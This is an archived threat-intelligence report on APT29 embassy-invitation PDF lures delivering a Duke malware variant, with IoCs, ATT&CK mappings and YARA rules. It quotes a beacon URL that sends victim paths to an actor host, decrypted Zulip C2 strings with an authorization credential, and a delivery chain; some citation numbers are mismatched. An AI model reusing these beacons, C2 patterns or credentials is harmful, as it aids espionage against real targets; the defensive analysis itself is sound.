{
	"id": "a042ad32-08be-4c74-a55f-b92c0d52f878",
	"created_at": "2026-04-06T00:10:34.996506Z",
	"updated_at": "2026-04-10T03:37:33.236844Z",
	"deleted_at": null,
	"sha1_hash": "cad8860ce0240411bac67b9711813f84f1384da1",
	"title": "German Embassy Lure: Likely Part of Campaign Against NATO Aligned Ministries of Foreign Affairs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1622739,
	"plain_text": "German Embassy Lure: Likely Part of Campaign Against NATO Aligned Ministries of Foreign Affairs\r\nArchived: 2026-04-05 14:02:38 UTC\r\nExecutive Summary\r\nEclecticIQ analysts assess with high confidence that two observed PDF documents are part of an ongoing campaign targeting Ministries of Foreign Affairs of NATO-aligned countries. The PDF files masquerade as coming from the German embassy and contained two diplomatic invitation lures.\r\nOne of the PDFs delivered a variant of Duke - a malware that has been linked to Russian state-sponsored cyber espionage activities of APT29. The other file was very likely used for testing or reconnaissance, as it did not contain a payload, but notified the actor if a victim opened the email attachment.\r\nVictimology, lure documents, malware delivery and the malware itself resemble reports that have linked the campaign to APT29, an advanced persistent threat actor attributed to Russia's Foreign Intelligence Service (SVR). The threat actor used Zulip - an open-source chat application - for command-and-control, to evade and hide its activities behind legitimate web traffic. [1]\r\nMalicious PDF Document Used to Deliver HTML Smuggling\r\nEclecticIQ analysts identified two malicious PDF documents that masquerade as coming from the German embassy, and that targeted diplomatic entities with invitation lures. The documents used the following themes:\r\nhttps://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs\r\nPage 1 of 16\n\n“Farewell to Ambassador of Germany” and “Day of German Unity”. The first PDF contained embedded JavaScript code to deliver multi-staged payloads in HTML file format. PDF readers like Adobe Acrobat have a default setting that warns before execution of code inside a PDF document. Upon user execution the PDF document displays an “Open File” alert box (Figure 1).
If a victim opens it, the code will launch the malicious HTML file called Invitation_Farewell_DE_EMB.\r\nFigure 1 - Open File alert box.\r\nFigure 2 shows the German embassy invitation lure. The mailto address inside the PDF file refers to a legitimate domain, bahamas.gov.bs. Analysts observed the same domain in a report by Lab52 from mid-July. [2] Lab52 initially reported a campaign impersonating the Norwegian embassy and targeting diplomatic entities with invitation lures.\r\nAnalysts assess with high confidence that the PDF files impersonating the German embassy were very likely created by the same threat actor, due to overlaps in the victimology and phishing themes used.\r\nFigure 2 - German embassy invitation lure.\r\nFigure 3 shows the embedded JavaScript code inside the German embassy invitation lure PDF, which was generated by PyPDF2. [3]\r\nFigure 3 - Embedded JavaScript delivering Invitation_Farewell_DE_EMB.HTML.\r\nInvitation_Farewell_DE_EMB is an HTML file. Through HTML smuggling, the threat actor delivered a ZIP file that contained a malicious HTML Application (HTA). An HTA file contains both HTML and scripting code, forming a standalone malicious application that is executed by the Windows HTA engine mshta.exe, a widely used Living Off The Land Binary (LOLBIN) [4].
The zipped HTA file eventually delivers a Duke malware variant (Figure 4).\r\nFigure 4 - Delivery stages of Duke malware variant.\r\nFigure 5 shows the JavaScript code inside Invitation_Farewell_DE_EMB.html. The threat actor controlled the URL sgrhf[.]org[.]pk/wp-content/idx[.]php?n=ks\u0026q='+btoa(p) to receive the execution file path, read via window.location.pathname; the path reveals the username on the victim device and notifies the threat actor of a possibly successful attack.\r\nFigure 5 - HTML smuggling after the execution of the PDF lure document.\r\nDLL Sideloading Abused to Execute Duke Variant Malware\r\nAfter execution, the HTA file drops three files into the C:\\Windows\\Tasks directory for DLL Sideloading:\r\n• AppVIsvSubsystems64.dll - A library loaded by msoev.exe so that execution proceeds without failure.\r\n• Mso.dll - Duke malware variant loaded into msoev.exe via DLL Sideloading.\r\n• Msoev.exe - A legitimate signed Windows binary that automatically loads Mso.dll and AppVIsvSubsystems64.dll upon execution.\r\nFigure 6 – DLL Sideloading attempt into Msoev.exe.\r\nWindows API Hashing Used to Hide Import Address Table\r\nEclecticIQ analysts examined the dropped Duke malware variant (mso.dll). Analysis showed that the malware used Windows API hashing to hide the names of the Windows API function calls.
The actor used this technique to evade static malware scanners.\r\nFigure 7 shows the Windows libraries decoded from the ROR13 hashing algorithm:\r\n• Kernel32.dll: 6A4ABC5B\r\n• Ntdll.dll: 3CFA685D\r\n• User32.dll: 63C84283\r\nFigure 7 - ROR13 hashing algorithm inside disassembled Duke malware variant.\r\nXOR Encryption to Hide String Values\r\nAnalysts observed that all string values are encrypted by generic XOR encryption routines and are decrypted at execution. Figure 8 shows an example of a decrypted function inside mso.dll, which is used to open the lure Invitation.pdf. The malware uses the ShellExecuteA Windows API to open the PDF lure document. String data such as Invitation.pdf is stored statically inside the malware as an XOR encrypted stack string.\r\nFigure 8 – XOR decryption function inside disassembled Duke malware variant.\r\nFigure 9 shows the XOR decryption routine. This function performs a one-time XOR decryption of the byte array, using the last byte of the encrypted array as the key to decrypt it.\r\nFigure 9 - XOR decryption routine inside disassembled Duke malware variant.\r\nFigure 10 shows the manual decryption of an XOR encrypted stack string with the hex value key “F”:\r\nFigure 10 – Manually decrypted stack string.\r\nZulip: Hiding C2 Communication in Legitimate Web Traffic\r\nEclecticIQ analysts observed that the threat actor used Zulip servers to establish a C2 connection and to blend with legitimate web traffic.
[2] Zulip is an open-source chat application that uses Amazon web services to receive and send chat messages. The actor used the API features of Zulip to send victim details to an actor-controlled chat room (toyy[.]zulipchat[.]com), and to issue malicious remote commands.\r\nFigure 11 - C2 communications from toyy[.]zulipchat[.]com.\r\nAll of the API request headers such as URL, authorization token, and the request itself are stored encrypted inside the Duke malware variant. The decrypted contents can be seen in Appendix A below.\r\nPivoted PDF Document Notifies Threat Actor About Success Rate\r\nPivoting on parameters in the previously identified URL - sgrhf[.]org[.]pk/wp-content/idx[.]php?n=ks\u0026q='+btoa(p) - analysts identified a second PDF file. The PDF (Figure 12) used a “Day of German Unity” lure. Analysts assess with moderate confidence that the PDF document was very likely used by the threat actor for reconnaissance or for testing purposes. It did not contain a payload, but notified the actor if a victim opened the email attachment, by way of a notification sent through the compromised domain edenparkweddings[.]com.\r\nFigure 12 - “Day of German Unity” reception lure.\r\nAttribution\r\nEclecticIQ analysts assess with high confidence that the identified PDF documents are part of a wider campaign targeting diplomatic corps across the globe. Victimology, themes of the phishing lures, malware delivery and the malware itself resemble OSINT reports that attributed the campaign to APT29.
[1] [2]\r\nFigure 13 – Diamond Model of this campaign.\r\nAPT29, also known as CozyBear, The Dukes, Cloaked Ursa, Nobelium and UNC2452, is an advanced persistent threat actor (APT) active since 2008. The US and UK governments attribute APT29 to Russia's Foreign Intelligence Service (SVR), which is responsible for the collection of political and economic intelligence from foreign countries.\r\nThe Duke malware variant was first described by F-Secure [6]. EclecticIQ analysts identified code similarities between a sample analysed by Lab52 [5] and samples seen in the recent case. [6]\r\nAPT29 is known to abuse legitimate web services such as Microsoft OneDrive and Notion APIs to perform command-and-control (C2) communication in an evasive way. In this new campaign the threat actor used Zulip web services as C2. [4]\r\nAPT29’s primary targets are governments and government subcontractors, political organizations, research firms, and critical industries such as energy, healthcare, education, finance, and technology in the US and Europe.\r\nProtection and Mitigation Strategies\r\nConfigure intrusion detection systems (IDS) and intrusion prevention systems (IPS) or any network defence mechanisms to alert on and block suspicious network traffic going through unexpected web services.\r\nUse the YARA rules provided in Appendix B to search Windows endpoints for potential Duke malware variant infections.\r\nImplement an application allow-list policy on Windows hosts to prevent potential execution of LOLBINs like msoev.exe.\r\nIndicators of compromise (IoC)\r\nPDF Lure:\r\nfc53c75289309ffb7f65a3513e7519eb\r\n50f57a4a4bf2c4b504954a36d48c99e7\r\nC2 
Servers:\r\ntoyy[.]zulipchat[.]com\r\nsgrhf[.]org[.]pk\r\nedenparkweddings[.]com\r\nDuke Malware Variant:\r\n0be11b4f34ede748892ea49e473d82db\r\n5e1389b494edc86e17ff1783ed6b9d37\r\nd817f36361f7ac80aba95f98fe5d337d\r\nMITRE ATT\u0026CK Techniques\r\nSpearphishing Attachment - T1566.001\r\nDLL Side-Loading - T1574.002\r\nHTML Smuggling - T1027.006\r\nEmbedded Payloads - T1027.009\r\nDynamic API Resolution - T1027.007\r\nSystem Binary Proxy Execution: Mshta - T1218.005\r\nApplication Layer Protocol: Web Protocols - T1071.001\r\nUser Execution: Malicious File - T1204.002\r\nCompromise Infrastructure: Web Services - T1584.006\r\nAppendix A\r\nList of decrypted strings.\r\nCt`dtbeP'\r\nCt`dtbeP\r\nresult\r\nsuccess\r\nsubscriptions=[{name:%d}]\u0026principals=[%d]\r\nPOST\r\napi/v1/users/me/subscriptions\r\nincipals=[%d]\r\ntype=stream\u0026to=%d\u0026topic=stream events\u0026content=hello?\r\nPOST\r\napi/v1/messages\r\ntopic=stream events\u0026content=hello?\r\nstream_id\r\nLdrLoadDll\r\ncurl/7.68.0\r\napi/v1/messages?anchor=newest\u0026num_before=1\u0026num_after=0\u0026narrow=[{operator:has,operand:attachment},{operator:stream,operand:%d}]\r\nInternetOpenA\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic\r\nZ2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6\r\nInvitation.pdf\r\napi/v1/messages\r\nInternetReadFile\r\nHttpSendRequestA\r\nHttpOpenRequestA\r\nInternetConnectA\r\ntoyy.zulipchat.com\r\napi/v1/messages/%d\r\nInternetCloseHandle\r\napi/v1/users/me/subscriptions\r\napi/v1/get_stream_id?stream=%d\r\nsubscriptions=[{name:%d}]\u0026principals=[%d]\r\ntype=stream\u0026to=%d\u0026topic=stream events\u0026content=%s\r\ntype=stream\u0026to=%d\u0026topic=stream 
events\u0026content=hello?\r\nPOST\r\nopen\r\nresult\r\nDELETE\r\ncontent\r\nsuccess\r\nmessages\r\nAppendix B\r\nAPT29_Duke_Malware_Jul17 YARA rule.\r\nrule APT29_Duke_Malware_Jul17\r\n{\r\n    meta:\r\n        description = \"Detects APT29 Duke malware variant\"\r\n        Author = \"EclecticIQ Threat Research Team\"\r\n        creation_date = \"2023-07-30\"\r\n        classification = \"TLP:WHITE\"\r\n        hash1 = \"0be11b4f34ede748892ea49e473d82db\"\r\n        hash2 = \"5e1389b494edc86e17ff1783ed6b9d37\"\r\n    strings:\r\n        $x1 = {48 89 4C 24 08 48 89 54 24 10 4C 89 44 24 18 4C 89 4C 24 20 48 83 EC 64 48 C7 C1}\r\n        /* XOR stack-string decryption routine matched by $decryption_routine below:\r\n        0x2ac406170 80790F00    cmp byte ptr [rcx + 0xf], 0\r\n        0x2ac406174 4889C8      mov rax, rcx\r\n        0x2ac406177 751C        jne 0x2ac406195\r\n        0x2ac406179 4889CA      mov rdx, rcx\r\n        0x2ac40617c 488D490F    lea rcx, [rcx + 0xf]\r\n        0x2ac406180 440FB64010  movzx r8d, byte ptr [rax + 0x10]\r\n        0x2ac406185 443002      xor byte ptr [rdx], r8b\r\n        0x2ac406188 4883C201    add rdx, 1\r\n        0x2ac40618c 4839CA      cmp rdx, rcx\r\n        0x2ac40618f 75EF        jne 0x2ac406180\r\n        0x2ac406191 C6400F01    mov byte ptr [rax + 0xf], 1\r\n        0x2ac406195 C3          ret\r\n        */\r\n        $decryption_routine = {\r\n            80 79 ?? 00\r\n            48 89 C8\r\n            75 ??\r\n            48 89 CA\r\n            48 8D 49 ??\r\n            44 0F B6 40 ??\r\n            44 30 02\r\n            48 83 C2 01\r\n            48 39 CA\r\n            75 ??\r\n            C6 40 ?? 
01\r\n            C3\r\n        }\r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        ($x1 or $decryption_routine) and\r\n        filesize \u003c= 2MB\r\n}\r\nAPT29_Embassy_Invitation_Lure YARA rule.\r\nrule APT29_Embassy_Invitation_Lure\r\n{\r\n    meta:\r\n        description = \"Detects APT29 Embassy Invitation Lure\"\r\n        Author = \"EclecticIQ Threat Research Team\"\r\n        creation_date = \"2023-07-30\"\r\n        classification = \"TLP:WHITE\"\r\n        hash1 = \"fc53c75289309ffb7f65a3513e7519eb\"\r\n    strings:\r\n        $pdf_meta1 = {2f 54 79 70 65 20 2f 45 6d 62 65 64 64 65 64 46 69 6c 65}\r\n        $pdf_meta2 = \"q='+btoa(p)\" fullword ascii wide nocase\r\n        $x1 = {2F 50 72 6F 64 75 63 65 72 20 28 50 79 50 44 46 32 29}\r\n        $x2 = \"Invitation\" fullword ascii wide nocase\r\n        $x3 = \"embassy\" fullword ascii wide nocase\r\n        $x4 = \"reception\" fullword ascii wide nocase\r\n    condition:\r\n        ( uint32(0) == 0x46445025 or uint32(0) == 0x4450250a ) and\r\n        all of ($pdf_meta*) and any of ($x*) and\r\n        filesize \u003c= 1MB\r\n}\r\nAbout EclecticIQ Intelligence \u0026 Research Team\r\nEclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence \u0026 Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.\r\nWe would love to hear from you.
Please send us your feedback by emailing us at research@eclecticiq.com.\r\nReferences\r\n[1] “mshta | LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Mshta/ (accessed Jul. 31, 2023).\r\n[2] “Zulip: Open-source team chat with topic-based threading,” Zulip. https://zulipchat.com/ (accessed Jul. 31, 2023).\r\n[3] “F-Secure_Dukes_Whitepaper.pdf.” Accessed: Aug. 03, 2023. [Online]. Available: https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf\r\n[4] “APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, StellarParticle, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, Group G0016 | MITRE ATT\u0026CK®.” https://attack.mitre.org/groups/G0016/ (accessed Jul. 31, 2023).\r\n[5] M. Fenniak, “PyPDF2: A pure-python PDF library capable of splitting, merging, cropping, and transforming PDF files.”\r\n[6] “mshta | LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Mshta/ (accessed Jul. 31, 2023).\r\nSource: https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs"
	],
	"report_names": [
		"german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ff375ef-7859-4d44-9399-06c9d1d9359c",
			"created_at": "2023-07-11T02:00:10.063244Z",
			"updated_at": "2026-04-10T02:00:03.367017Z",
			"deleted_at": null,
			"main_name": "SmugX",
			"aliases": [],
			"source_name": "MISPGALAXY:SmugX",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434234,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.pdf",
		"text": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.txt",
		"img": "https://archive.orkl.eu/cad8860ce0240411bac67b9711813f84f1384da1.jpg"
	}
}